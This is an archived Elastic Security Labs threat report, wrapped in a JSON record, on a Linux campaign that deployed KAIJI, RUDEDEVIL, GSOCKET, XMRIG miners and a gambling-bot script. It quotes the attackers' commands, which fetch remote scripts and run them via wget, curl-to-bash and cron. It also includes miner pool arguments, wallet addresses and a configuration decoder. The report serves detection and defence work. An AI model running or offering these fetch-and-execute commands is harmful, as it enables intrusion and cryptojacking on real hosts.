{
	"id": "d4d90004-f61b-42cd-a752-b019d0c1f7af",
	"created_at": "2026-04-10T03:20:41.632288Z",
	"updated_at": "2026-04-10T03:22:18.304182Z",
	"deleted_at": null,
	"sha1_hash": "21255dabf13b81070819344ae2b82e9d6ebe0573",
	"title": "Betting on Bots: Investigating Linux malware, crypto mining, and gambling API abuse",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 18814817,
	"plain_text": "Betting on Bots: Investigating Linux malware, crypto mining, and\r\ngambling API abuse\r\nBy Remco Sprooten, Ruben Groenewoud\r\nPublished: 2024-09-27 · Archived: 2026-04-10 02:20:18 UTC\r\nIntroduction\r\nIn recent months, Elastic Security Labs has uncovered a sophisticated Linux malware campaign targeting vulnerable servers.\r\nThe attackers initiated the compromise in March 2024 by exploiting an Apache2 web server. After gaining initial access, the threat\r\nactors deployed a complex intrusion set to establish persistence and expand their control over the compromised host.\r\nThe threat actors utilized a mixture of tools and malware, including C2 channels disguised as kernel processes, Telegram bots\r\nfor communication, and cron jobs for scheduled task execution. Notably, they deployed multiple malware families, such as\r\nKAIJI and RUDEDEVIL, alongside custom-written malware. KAIJI, known for its DDoS capabilities, and RUDEDEVIL, a\r\ncryptocurrency miner, were used to exploit system resources for malicious purposes.\r\nOur investigation revealed a potential Bitcoin/XMR mining scheme that leverages gambling APIs, suggesting the attackers\r\nmight be conducting money laundering activities using compromised hosts. We also gained access to a file share that hosted\r\ndaily uploads of fresh KAIJI samples with previously unseen hashes, indicating active development and adaptation by the\r\nmalware authors.\r\nThis research publication delves into the details of the campaign, providing a comprehensive analysis of the attackers'\r\ntactics, techniques, and procedures. We explore how they established initial access, the methods used for persistence and\r\nprivilege escalation, and the malware deployed at each stage. 
Additionally, we discuss the command and control\r\ninfrastructure, including the use of GSOCKET and Telegram for stealthy communication.\r\nExecution flow\r\nInitial access\r\nOur team observed a host that was initially compromised in March 2024 by obtaining arbitrary code execution on a server\r\nrunning Apache2. Evidence of this compromise is seen in the execution of the id command via the Apache2 process, after\r\nwhich we see the threat actor exploiting the web server and deploying KAIJI malware under the www-data user account.\r\nShortly after the KAIJI deployment, the attacker used the www-data account to download a script named 00.sh from the\r\nURL http://61.160.194[.]160:35130, which, after further investigation, also hosted several versions of RUDEDEVIL\r\nmalware.\r\n00.sh is a stager that:\r\nSets its default shell and PATH.\r\nDeletes several log files to erase traces of execution.\r\nLeverages ps, netstat, lsof and a list of common mining process names to kill any potential mining\r\ncompetition on the compromised host.\r\nFlushes the iptables rules on the host, sets several iptables rules to block connections to specific destination\r\nports and mining pools, and disables iptables.\r\nFinally, a second stage (sss6 / sss68) is downloaded and executed, and execution traces are erased.\r\nThe figure below shows a compressed version of the stager. Lines annotated with [...] are shortened to enhance\r\nreadability.\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 1 of 26\n\nCompressed version of the 00.sh stager\r\nFileserver\r\nVia the backdoored web server process, the attacker downloaded and executed malware through the following command:\r\nsh -c wget http://107.178.101[.]245:5488/l64;chmod 777 l64;./l64;rm -r l64;wget http://107.178.101[.]245:5488/l86;chmod 7\r\nThe l64 and l86 files are downloaded from http://107.178.101[.]245:5488, after which they are granted all\r\npermissions, executed, and removed. 
Looking at the server that is hosting these malware samples, we see the following:\r\nRejetto File Server Hosting Several Pieces of Malware\r\nThis seems to be a file server, hosting several types of malware for different architectures. The file server leverages the\r\nRejetto technology. The hosted files have upload dates and download counters. For example, the download.sh file that was\r\nuploaded September 10th had already been downloaded 3,100 times.\r\nDownload Counter Indicating 3000+ Downloads Within 2 Weeks of Upload\r\nRUDEDEVIL/LUCIFER\r\nUpon closer inspection, the file sss6, which was downloaded and executed, has been identified as the RUDEDEVIL\r\nmalware. Early in the execution process, we encounter an embedded message characteristic of this malware family:\r\nRUDEDEVIL Malware Characteristic\r\nHi, man. I\\'ve seen several organizations report my Trojan recently,\r\nPlease let me go. I want to buy a car. That\\'s all. I don\\'t want to hurt others.\r\nI can\\'t help it. My family is very poor. In China, it\\'s hard to buy a suite.\r\nI don\\'t have any accommodation. I don\\'t want to do anything illegal.\r\nReally, really, interested, you can give me XmR, my address is 42cjpfp1jJ6pxv4cbjxbbrmhp9yuzsxh6v5kevp7xzngklnutnzqvu9bhxs\r\nthank yo\r\nWe note that the files l64 and l86 that are hosted on the file server contain the same malware. 
When analyzing the\r\nexecution flow of the malware, we see that the main function performs several key tasks:\r\nDaemon Initialization: The process is converted into a daemon using daemon(1, 0).\r\nSocket Creation: A socket is created and bound to a specific port.\r\nSignal Handling: Custom signal handlers are set up for various signals.\r\nService Initialization: Several services are started using SetFILE.\r\nPrivilege Handling: It checks for root privileges and adjusts resource limits accordingly.\r\nDecryption: The malware decrypts its configuration blobs.\r\nThread Creation: Multiple threads are spawned for tasks like mining, killing processes, and monitoring network and\r\nCPU usage.\r\nMain Loop: The program enters an infinite loop where it repeatedly connects to a server and sleeps for a specified\r\nduration.\r\nWhen examining the encryption routine, we find it utilizes XOR-based encoding:\r\nDareDevil Encryption Routine\r\nTo decode the contents statically, we developed a basic Python snippet:\r\ndef DecryptData(data_block, encryption_key):\r\n    # Only the low byte of the key is used; 0x03FF reduces to 0xFF\r\n    key_modifier = encryption_key \u0026 0xFF\r\n    key_index = key_modifier // 0x5F  # 0x5F = 95 in decimal\r\n    # Single-byte modifier derived from the key: for 0xFF, (255 - 2*95) + 88 = 0x99\r\n    modifier = (key_modifier - (key_index * 0x5F)) + 0x58  # 0x58 = 88 in decimal\r\n    for i in range(len(data_block)):\r\n        data_block[i] ^= modifier\r\n        data_block[i] \u0026= 0xFF  # Ensure 8-bit value\r\n        data_block[i] += modifier\r\n        data_block[i] \u0026= 0xFF  # Ensure 8-bit value\r\n    return data_block\r\n\r\n# Encoded data as hex strings (the second string is truncated in the published figure)\r\nencoded_data = [\r\n    '4c494356515049490c467978',\r\n    '0d4f1e4342405142454d0b42534e380f0f5145424f0c53034e4f4f4a0c4f40573801393939391e0d451e020141303727222026254f252d3726434',\r\n    '0f424d4e0f435536575649484b',\r\n    '5642424e380f0f5654430c42014a494c45460c534f4d38070602050f435352434356544b',\r\n]\r\nencryption_key = 0x03FF  # 1023 in decimal\r\n\r\n# Process and decrypt each encoded data string\r\nfor data in encoded_data:\r\n    # Drop a dangling nibble so a truncated hex string still decodes\r\n    data = data[:len(data) // 2 * 2]\r\n    # Convert hex string to list of integers\r\n    data_block = list(bytes.fromhex(data))\r\n    # Decrypt the data\r\n    decrypted_block = DecryptData(data_block, encryption_key)\r\n    # Convert decrypted data back to bytes\r\n    decrypted_bytes = bytes(decrypted_block)\r\n    print(\"Decrypted text:\", decrypted_bytes.decode('utf-8', errors='ignore'))\r\nAfter decoding the configuration, the following values are revealed:\r\nThe first value is the C2 domain nishabii[.]xyz.\r\nThe second value reveals options that will be passed to XMRIG.\r\nThe third value shows the temp file location the malware uses.\r\nThe fourth and last string shows the download location for the XMRIG binary.\r\nThread Management in the Malware\r\nThe malware initiates several threads to handle its core operations. Let’s explore how some of these functions work in detail.\r\nUnderstanding the KillPid Function\r\nOne of the threads runs the KillPid function, which is designed to continuously monitor and manage processes. The function\r\nbegins by detaching its current thread, allowing it to run in the background without blocking other processes. It then enters\r\nan infinite loop, repeatedly executing its tasks.\r\nAt the heart of its functionality is an array called sb_name, which contains the names of processes the malware wants to\r\nterminate.\r\nRUDEDEVIL kill process array\r\nEvery two seconds, the function checks the system for processes listed in this array, retrieving their process IDs (PIDs) using\r\na helper function called getPidByName. After each iteration, it moves to the next process in the list, ensuring all processes\r\nin sb_name are handled.\r\nInterestingly, after processing all elements in the array, the function enters an extended sleep for 600 seconds — roughly 10\r\nminutes — before resuming its process checks. 
This extended sleep period is likely implemented to conserve system\r\nresources, ensuring the malware doesn't consume too much CPU time while monitoring processes.\r\nUnderstanding the Get_Net_Messages Function\r\nAnother crucial thread is responsible for monitoring network traffic, specifically focusing on the eth0 network interface.\r\nThis functionality is handled by the getOutRates function. The function begins by setting up necessary variables and\r\nopening the /proc/net/dev file, which contains detailed network statistics for each interface.\r\nGetting network rates from /proc/net/dev\r\nIf the file is successfully opened, the malware reads a block of data — up to 1024 bytes — and processes it to extract the\r\nrelevant network statistics. It specifically looks for the eth0 interface, parsing the output rate data using a standard string\r\nparsing method. If successful, the function returns the output rate for eth0; otherwise, it returns 0, ensuring the malware\r\ncontinues functioning even if an error occurs.\r\nThis routine allows the malware to quietly monitor the network activity of the infected machine, likely to track data being\r\nsent or received across the interface.\r\nUnderstanding the Get_Cpu_Message Function\r\nFor CPU monitoring, the malware uses the GetCpuRates function. This function continuously monitors the CPU usage by\r\nreading data from /proc/stat. Similar to how the network data is handled, the CPU statistics are read and parsed,\r\nallowing the malware to calculate the system's CPU usage.\r\nGetting CPU information from /proc/stat\r\nThe function operates in an infinite loop, sleeping for one second between each iteration to avoid overwhelming the system.\r\nIf the file cannot be opened for some reason, the function logs an error and gracefully exits. 
However, as long as it’s able to\r\nread the file, it continually monitors CPU usage, ensuring the malware remains aware of system performance.\r\nUnderstanding the Send_Host_Message Function\r\nPerhaps the most critical thread is the one responsible for sending system information back to the malware operators. The\r\n_SendInfo function performs this task by collecting data about the infected system’s CPU and network usage. It begins by\r\nsetting up buffers and preparing file paths to gather the necessary data. Depending on the system’s status, it formats the CPU\r\nand network usage into a string.\r\nSending system info back to the C2\r\nAdditionally, the function checks whether a particular process is running on the system and adjusts its formatted message\r\naccordingly. Finally, it sends this formatted data back to the command-and-control server via a socket connection.\r\nIn essence, this function allows the malware to remotely monitor the infected machine, gathering key details like CPU load\r\nand network activity. The operators can use this information to assess the status of their infection and adjust their activities\r\nas needed.\r\nConnecting to the Command-and-Control (C2) Server\r\nOnce all the threads are up and running, the malware shifts its focus to establishing a connection with its C2 server. 
This is\r\nmanaged by the ConnectServer function in the main thread, which handles communication with the server and executes\r\ncommands remotely.\r\nUnderstanding the ConnectServer Function\r\nThe first task the ConnectServer function performs is establishing a connection to the C2 server using ServerConnectCli.\r\nAfter successfully connecting, the malware configures the socket to enable keep-alive settings, ensuring that the connection\r\nremains stable over extended periods of time.\r\nOnce the connection is set up, the malware collects various pieces of system information, including the hostname, user\r\ninformation, CPU specs, and memory details. This information is then sent to the server as an initial data payload, providing\r\nthe attackers with a detailed view of the infected machine.\r\nAfter this initial setup, the malware enters an ongoing loop where it awaits and processes commands from the server. The\r\ntypes of commands handled are varied and can include tasks like launching a DDoS attack, stopping or starting CPU-intensive operations, executing system commands, or managing cryptocurrency mining activities. The loop continues\r\nindefinitely, ensuring that the malware is ready to execute any command sent by its operators.\r\nWhen the connection is no longer needed, or when the malware receives a termination command, it gracefully closes the\r\nsocket, ending the session with the server.\r\nCommand-and-Control (C2) Commands\r\nThe ConnectServer function processes a variety of commands from the C2 server, each designed to control a different\r\naspect of the infected system. 
Here’s a breakdown of the commands handled by the malware:\r\nCase 4: The malware calls the DealwithDDoS function, likely initiating a Distributed Denial of Service (DDoS)\r\nattack.\r\nCase 5: Sets the StopFlag to 1, which could signal the malware to stop specific tasks.\r\nCase 6: Downloads a file from the server using http_get, changes its permissions, and then executes it. This\r\ncommand allows the attackers to run additional malware or scripts on the infected machine.\r\nCase 7: Executes a system command using the system function, providing the attackers with direct control over the\r\nsystem’s command line.\r\nCase 8: Sets StopCpu to 0, restarting any previously halted CPU tasks.\r\nCase 9: Sets StopCpu to 1, halting all CPU tasks.\r\nCase 0xA: Updates the CPU mining configuration with new data and retrieves the PID of the current process,\r\nallowing the malware to modify its cryptocurrency mining operations.\r\nCase 0xB: Sets stopxmr to 1, effectively stopping the XMRIG miner.\r\nCase 0xC: Resets stopxmr to 0 and retrieves the current process PID, resuming the mining activity.\r\nProcessing of C2 commands\r\nEach command gives the malware operators precise control over how the infected machine behaves, whether it’s\r\nparticipating in a DDoS attack, running new malware, or managing mining operations.\r\nVariants of RUDEDEVIL Malware and XMRIG Configuration\r\nWhile the file server mentioned before was active, we observed multiple versions of the RUDEDEVIL malware being\r\nuploaded. 
The core functionality of these versions remained largely the same, with the only significant variation being the\r\nembedded XMRIG commands used for cryptocurrency mining.\r\nEach version of the malware was configured to connect to the same mining pool, c3pool.org, but with slight differences in\r\nthe parameters passed to the XMRIG miner:\r\n-o stratum+tcp://auto.c3pool[.]org:19999 -u\r\n41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p R\r\n-o stratum+tcp://auto.c3pool[.]org:19999 -u\r\n41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p 2\r\n-o stratum+tcp://auto.c3pool[.]org:19999 -u\r\n41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p php\r\n-o stratum+tcp://auto.c3pool[.]org:19999 -u\r\n42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p 0\r\nEach of these commands directs the miner to connect to the same mining pool but specifies different wallets or\r\nconfigurations. By examining the c3pool application, we confirmed that both XMR addresses associated with these\r\ncommands are currently active and mining.\r\nC3pool mining revenue\r\nAdditionally, through this analysis, we were able to estimate the total profit generated by these two mining campaigns,\r\nhighlighting the financial impact of the RUDEDEVIL malware and its connection to illegal cryptocurrency mining\r\noperations.\r\nGSOCKET\r\nTo establish persistence, the threat actor downloaded and installed GSOCKET, a network utility designed to enable\r\nencrypted communication between machines that are behind firewalls or NAT. GSOCKET creates secure, persistent\r\nconnections through the Global Socket Relay Network (GSRN). 
This open-source tool includes features like AES-256\r\nencryption, support for end-to-end communication security, and compatibility with SSH, netcat, and TOR, which allow for\r\nencrypted file transfers, remote command execution, and even the creation of hidden services.\r\nAlthough GSOCKET is not inherently malicious, its features can be leveraged for suspicious purposes.\r\nOnce deployed, GSOCKET performs several actions to maintain persistence and conceal its presence. First, it checks the\r\nsystem for active kernel processes to decide which process it will masquerade as:\r\nGSOCKET Kernel Process Masquerading\r\nIt then creates the /dev/shm/.gs-1000 directory to download and store its binary in shared memory. Additionally, by\r\ndefault, it sets up an /htop directory under /home/user/.config/htop/ to store both the GSOCKET binary and the secret\r\nkey used for its operations.\r\nNext, a cron job that runs the GSOCKET binary with the secret key every minute is set up.\r\nGSOCKET Crontab Persistence\r\nThe binary is executed under the name of a kernel process using the exec -a [process_name] command, further enhancing\r\nthe ability to evade detection. The cron job includes a base64 encoded command that, when decoded, ensures the persistence\r\nmechanism is regularly executed and disguised as a legitimate kernel process:\r\nWhen decoding the payload, we see how the defunct.dat secret key is used as an argument to execute the defunct\r\nbinary, which is masqueraded as [raid5wq] through the use of the exec -a command:\r\nIn addition to using cron jobs, GSOCKET has the capability to establish persistence through shell profile modification, run\r\ncontrol (rc.local) and Systemd. 
GSOCKET enumerates potential persistence locations:\r\nGSOCKET Persistence Technique Enumeration\r\nGSOCKET supports multiple webhooks, such as Telegram or Discord integrations, enabling remote control and\r\nnotifications:\r\nGSOCKET Webhook Capabilities\r\nFinally, after installation, GSOCKET ensures that all files that are created or modified will be timestomped to attempt to\r\nerase any trace of installation:\r\nGSOCKET Timestomping Capability\r\nThese features make GSOCKET an attractive tool for threat actors seeking stealth and persistence. In this campaign,\r\nGSOCKET was exploited to establish covert channels back to C2 servers while attempting to evade detection.\r\nAdditionally, a PHP payload was fetched from an external IP and saved as 404.php, likely functioning as a backdoor for\r\nfuture access. We did not manage to obtain this payload.\r\nPost compromise dwell time\r\nAfter a three-week period of quiet with no noticeable activity, the threat actors resumed operations by utilizing the built-in\r\nPython3 to establish a reverse connection to a new command-and-control server.\r\nAfter regaining access to the host, a newer version of the KAIJI malware was deployed.\r\nKAIJI malware: a comparison to previous samples\r\nWhile investigating the files on the discovered file server, we saw a shell script. This shell script seems to be the main file\r\ndownloaded by an earlier stage, ensuring the correct architecture for the victim is used.\r\nKAIJI Download.sh Script\r\nThe same shell script is found in other reports where it is used to deploy KAIJI.\r\nAs part of our investigation, we analyzed the KAIJI malware samples found on the file server and compared them with\r\nsamples identified by Black Lotus Labs in 2022. 
Their detailed analysis of Chaos (KAIJI) can be found in their blog post\r\nhere.\r\nUsing BinDiff, a binary comparison tool, we compared the functions in the binaries. The analysis revealed that the code in\r\nour sample was identical to the previously identified KAIJI sample from 2022.\r\nBindiff for Old and New Version of KAIJI\r\nAlthough the code was the same, one critical difference stood out: the C2 server address. While the functionality\r\nremained consistent in both binaries, they pointed to different C2 domains.\r\nDelving deeper into the disassembly, we identified a function named main_Link. This function is responsible for decoding\r\nthe C2 server address used by the malware.\r\nKAIJI main_link Function\r\nOnce decoded, the function searches for the |(odk)/*- postfix in the address and removes it, leaving only the C2 domain\r\nand port. This process ensures the malware can communicate with its C2 server, though the address it contacts may change\r\nbetween samples.\r\nGiven that some resources have been published that statically reverse engineer KAIJI, we will instead take a more detailed\r\nlook at its behaviors.\r\nKAIJI Dynamic Analysis - Part 1\r\nAfter execution, KAIJI creates several files in the /etc/ and /dev/ directories: /etc/id.services.conf, /etc/32678,\r\n/dev/.img and /dev/.old. These scripts are placed to establish persistence.\r\nTwo services are set up, /etc/init.d/linux_kill and crond.service. crond.service is executed by Systemd, while\r\nlinux_kill is used for SysVinit persistence.\r\nAfter reloading the Systemd daemon, the first network connection to the C2 is attempted.\r\nKAIJI Dynamic Analysis - Part 2\r\nNext, the Systemd Late generator service file is created. 
More information on the workings of Systemd, and different\r\nways of establishing persistence through this method, can be found in our recent blog series dubbed Linux Detection\r\nEngineering - A primer on persistence mechanisms.\r\nKAIJI creates the /boot/System.img.config file, which is an executable that is executed through the previously deployed\r\nSystemd services. This binary is, amongst other binaries, another way of establishing persistence.\r\nKAIJI Dynamic Analysis - Part 3\r\nNext, KAIJI adjusts the SELinux policies to allow unauthorized actions. It searches audit logs for denied operations related\r\nto System.img.conf, generates a new SELinux policy to permit these actions, and installs the policy with elevated\r\npriority. By doing this, the malware bypasses security restrictions that would normally block its activity.\r\nAdditionally, it sets up multiple additional forms of persistence through bash profiles, and creates another two malicious\r\nartifacts: /usr/lib/libd1rpcld.so and /.img.\r\nRight after, /etc/crontab is altered through an echo command, ensuring that the /.img file is executed by root on a set\r\nschedule.\r\nKAIJI Dynamic Analysis - Part 4\r\nKAIJI continues to move several default system binaries to unusual locations, attempting to evade detection along the way.\r\nKAIJI Dynamic Analysis - Part 5\r\nKAIJI uses the renice command to grant PID 2957, one of KAIJI's planted executables, the highest possible priority (on\r\na scale of -20 to 19, lowest being the highest priority), ensuring it gets more CPU resources than other processes.\r\nTo evade detection, KAIJI employed the bind mount technique, a defense evasion method that obscures malicious activities\r\nby manipulating how directories are mounted and viewed within the system.\r\nFinally, we see a trace of cron executing the /.img, which was planted in the /etc/crontab file earlier.\r\nThe saga continues\r\nTwo weeks later, the Apache backdoor became active again. Another backdoor was downloaded via the www-data user\r\nthrough the Apache2 process using the command:\r\nsh -c wget http://91.92.241[.]103:8002/gk.php\r\nThe contents of this payload remain unknown. At this stage, we observed attempts at manual privilege escalation, with the\r\nattackers deploying pspy64. Pspy is a command-line tool for process snooping on Linux systems without requiring root\r\npermissions. It monitors running processes, including those initiated by other users, and captures events like cron job\r\nexecutions. This tool is particularly useful for analyzing system activity, spotting privilege escalation attempts, and auditing\r\nthe commands and file system interactions triggered by processes in real time. It's commonly leveraged by attackers for\r\nreconnaissance in post-compromise scenarios, giving them visibility into system tasks and potential vulnerabilities.\r\nNotably, pspy64 was executed by the [rcu_preempt] parent, indicating that the threat actors had transitioned from\r\nleveraging the web server backdoor to using the GSOCKET backdoor.\r\nFurther attempts at privilege escalation involved exploiting CVE-2021-4034, also known as pwnkit. This vulnerability\r\naffects the pkexec component of the PolicyKit package in Linux systems, allowing an unprivileged user to execute\r\narbitrary code with root privileges. By leveraging this flaw, an attacker can gain elevated access to the system, potentially\r\nleading to full control over the affected machine.\r\nCustom built binaries\r\nRight after, the attackers attempted to download a custom-built malware named apache2 and apache2v86 from:\r\nhttp://62.72.22[.]91/apache2\r\nhttp://62.72.22[.]91/apache2v86\r\nWe obtained copies of these files, which currently have zero detections on VirusTotal. 
However, when executing them\r\ndynamically, we observed segmentation faults, and our telemetry confirmed segfault activity on the compromised host. Over\r\na week, the threat actor attempted to alter, upload and execute these binaries more than 15 times, but due to repeated\r\nsegfaults, it is unlikely that they succeeded in running this custom malware.\r\nWhile the binaries failed to execute, they still provided valuable insights during reverse engineering. We uncovered several\r\nXOR-encoded strings within the samples.\r\nApache2 XOR-Encoded Strings\r\nThe XOR key used to encode the strings was identified as 0x79 (or the character y). After decoding the strings, we\r\ndiscovered fragments of an HTTP request header that the malware was attempting to construct:\r\n/934d9091-c90f-4edf-8b18-d44721ba2cdc HTTP/1.1\r\nsec-ch-ua: \"Chromium\";v=\"122\", \"Google Chrome\";v=\"122\", \"Not-A.Brand\";v=\"99\r\nsec-ch-ua-platform: \"Windows\"\r\nupgrade-insecure-requests: 1\r\naccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signe\r\nreferer: https://twitter[.]com\r\naccept-language: ru,en-US;q=0.9\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.\r\nThis indicates that the malware was in the process of constructing HTTP requests. However, based on the incomplete nature\r\nof the headers and the repeated failures in execution, it’s clear that this piece of software was not yet fully developed or\r\noperational.\r\nAdditional reconnaissance\r\nThe attackers continued to use tools from The Hacker’s Choice, by downloading and executing whatserver.sh.\r\nThis shell script is designed to gather and display server information. 
It extracts details such as the fully qualified domain\r\nnames (FQDNs) from SSL certificates, Nginx, and Apache configuration files, along with system resource information like\r\nCPU and memory usage, virtualization details, and network settings. The script can also summarize recent activities,\r\nincluding last logged-in users and currently listening services.\r\nMining activities\r\nAfter nearly two weeks of manual exploitation attempts, the threat actors ceased their efforts to escalate privileges, likely\r\nhaving failed to gain root access. Instead, they established persistence as the www-data user, leveraging GSOCKET to set\r\nup an SSL connection, which was disguised as a kernel process called [mm_percpu_wq].\r\nAfter decoding the base64 contents, we get a very familiar looking output:\r\nThrough our behavioral rules, we see the threat actor listing the current user’s crontab entries, and echoing a payload directly\r\ninto the crontab.\r\nThis command tries to download http://gcp.pagaelrescate[.]com:8080/ifindyou every minute, and pipe it to bash.\r\nLooking at the contents of ifindyou, we see the following Bash script:\r\nStage 1 - ifindyou.sh\r\nThis script gathers hostname and IP information, downloads the SystemdXC archive from\r\nhttp://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC (XMRIG), stores this in /tmp/SystemdXC, extracts the archive\r\nand executes it with the necessary parameters to start mining Bitcoin.\r\nWhen examining the mining command, we can see how the malware configures XMRIG:\r\nThis command connects to the unmineable.com mining pool, using the infected machine’s hostname as an identifier in the\r\nmining process. 
At the time of writing, there are 15 active workers mining Bitcoin for the wallet address\r\n1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz.\r\nBitcoin Address Lookup\r\nUpon further investigation into the Bitcoin address, we found that this address has performed a single transaction.\r\nBitcoin Transaction\r\nInterestingly, the output address for this transaction points to a well-known hot wallet associated with Binance, indicating\r\nthat the attackers may have transferred their mining earnings to an exchange platform.\r\nBinance Wallet Destination\r\nWhen returning our focus back to the script, we also see two commands commented out, which will become clearer\r\nlater. The script executes:\r\ncurl -s http://gcp.pagaelrescate[.]com:8080/cycnet | bash\r\nLooking at this payload, we can see the following contents:\r\nStage 2 - cycnet.sh\r\nThis stage checks the output of the command, and sends this to a Telegram chat bot. Through our Telegram behavioral rule,\r\nwe can see that a Telegram POST request looks like this:\r\nThe cron job that is set up during this stage executes at minute 0, every 4th hour. This job executes:\r\ncurl -s http://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot | python3\r\nThe downloaded Python script automates interactions with an online gambling game through HTTP requests. 
The script includes functions that handle user authentication, betting, processing the outcomes, and sending data to a remote server. Upon closer examination, we identified the following key components of the script:\r\nGlobal Variables:\r\nusuario: Stores the user ID for managing the session.\r\napuesta: Represents the bet amount.\r\nganancias: Tracks the winnings and losses.\r\nsaldo_actual: Holds the current account balance.\r\nenviador_slot Global Variables\r\nUnderstanding the obteneruid Function\r\nThis function authenticates the user by sending a POST request with the necessary headers and JSON data to the remote server. If the user is not already set, it initializes a new session and retrieves the account balance. Upon successful authentication, it returns a session UUID, which is used for further interactions in the game.\r\nenviador_slot obteneruid Function\r\nUnderstanding the enviardatos Function\r\nThis function sends game data or status updates back to gcp.pagaelrescate[.]com, logging the results or actions taken during gameplay. It uses a simple GET request to transmit this data to the remote server.\r\nenviador_slot enviardatos Function\r\nUnderstanding the hacerjugada Function\r\nThe hacerjugada function simulates the betting process for a set number of rounds. It sends POST requests to place bets, updates the winnings or losses after each round, and calculates the overall results. If a bonus round is triggered, it calls completarbono() to handle any bonus game details. 
Between each betting round, the function enforces a 30-second delay to mimic natural gameplay and avoid detection.\r\nenviador_slot hacerjugada Function\r\nUnderstanding the completarbono Function\r\nWhen a bonus round is triggered, this function completes the round by sending a request containing the session ID and round ID. Based on the result, it updates the account balance and logs the winnings or losses. Any change in the balance is sent back to the remote server using the enviardatos() function.\r\nenviador_slot completarbono Function\r\nLikely Used for Testing Purposes\r\nIt’s important to note that this script is likely being used for testing purposes, as it interacts with the demo version of the gambling app. This suggests that the attackers might be testing the automation of gambling actions or trying to find vulnerabilities in the app before moving to the live version. The use of a demo environment implies they are refining their approach, potentially in preparation for more sophisticated or widespread attacks.\r\nREF6138 through MITRE ATT\u0026CK\r\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks. 
During this investigation, we identified the following tactics, techniques and sub-techniques:\r\nMITRE ATT\u0026CK tactics, techniques and sub-techniques used\r\nTactic | Technique | Sub-Technique\r\nResource Development | T1587: Develop Capabilities | Malware\r\nResource Development | T1588: Obtain Capabilities | Tool\r\nResource Development | T1608: Stage Capabilities | Upload Malware; Upload Tool\r\nInitial Access | T1190: Exploit Public-Facing Application | -\r\nExecution | T1059: Command and Scripting Interpreter | Unix Shell; Python\r\nExecution | T1053: Scheduled Task/Job | Cron\r\nPersistence | T1546: Event Triggered Execution | Unix Shell Configuration Modification\r\nPersistence | T1053: Scheduled Task/Job | Cron\r\nPersistence | T1505: Server Software Component | Web Shell\r\nPrivilege Escalation | T1068: Exploitation for Privilege Escalation | -\r\nDefense Evasion | T1140: Deobfuscate/Decode Files or Information | -\r\nDefense Evasion | T1222: File and Directory Permissions Modification | Linux and Mac File and Directory Permissions Modification\r\nDefense Evasion | T1564: Hide Artifacts | Hidden Files and Directories\r\nDefense Evasion | T1070: Indicator Removal | Timestomp\r\nDefense Evasion | T1036: Masquerading | Masquerade Task or Service\r\nDefense Evasion | T1027: Obfuscated Files or Information | Software Packing; Stripped Payloads; Command Obfuscation; Encrypted/Encoded File\r\nDiscovery | T1057: Process Discovery | -\r\nDiscovery | T1082: System Information Discovery | -\r\nDiscovery | T1061: System Network Configuration Discovery | -\r\nDiscovery | T1049: System Network Connections Discovery | -\r\nDiscovery | T1007: System Service Discovery | -\r\nCollection | T1119: Automated Collection | -\r\nCollection | T1005: Data from Local System | -\r\nCommand and Control | T1071: Application Layer Protocol | Web Protocols\r\nCommand and Control | T1132: Data Encoding | Standard Encoding\r\nCommand and Control | T1001: Data Obfuscation | -\r\nCommand and Control | T1573: Encrypted Channel | Symmetric Cryptography\r\nCommand and Control | T1105: Ingress Tool Transfer | -\r\nCommand and Control | T1571: Non-Standard Port | -\r\nCommand and Control | T1572: Protocol Tunneling | -\r\nCommand and Control | T1102: Web Service | -\r\nImpact | T1496: Resource Hijacking | -\r\nDetecting 
REF6138\r\nElastic Security implements a multi-layered approach to threat detection, leveraging behavioral SIEM and Endpoint rules, YARA signatures and ML-based anomaly detection approaches. This section describes the detections built by Elastic Security that play a key role in capturing the identified threats.\r\nDetection\r\nThe following detection rules were observed throughout the analysis of this intrusion set:\r\nSegfault Detection\r\nTimestomping using Touch Command\r\nShell Configuration Creation or Modification\r\nSystem Binary Moved or Copied\r\nPrevention\r\nThe following behavior prevention events were observed throughout the analysis of this intrusion set:\r\nLinux Reverse Shell via Suspicious Utility\r\nDefense Evasion via Bind Mount\r\nLinux Suspicious Child Process Execution via Interactive Shell\r\nPotential Linux Hack Tool Launched\r\nPrivilege Escalation via PKEXEC Exploitation\r\nPotential SSH-IT SSH Worm Downloaded\r\nScheduled Job Executing Binary in Unusual Location\r\nThe following YARA signatures are in place to detect the KAIJI and RUDEDEVIL malware samples, both on disk and in memory:\r\nLinux.Generic.Threat\r\nLinux.Hacktool.Flooder\r\nThe following, soon to be released, endpoint rule alerts were observed throughout the analysis of this intrusion set:\r\nPotential Shell via Web Server\r\nPotential Web Server Code Injection\r\nPotential Shell Executed by Web Server User\r\nDecode Activity via Web Server\r\nLinux Telegram API Request\r\nSuspicious Echo Execution\r\nHunting queries in Elastic\r\nThe events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return a high volume of signals or false positives. 
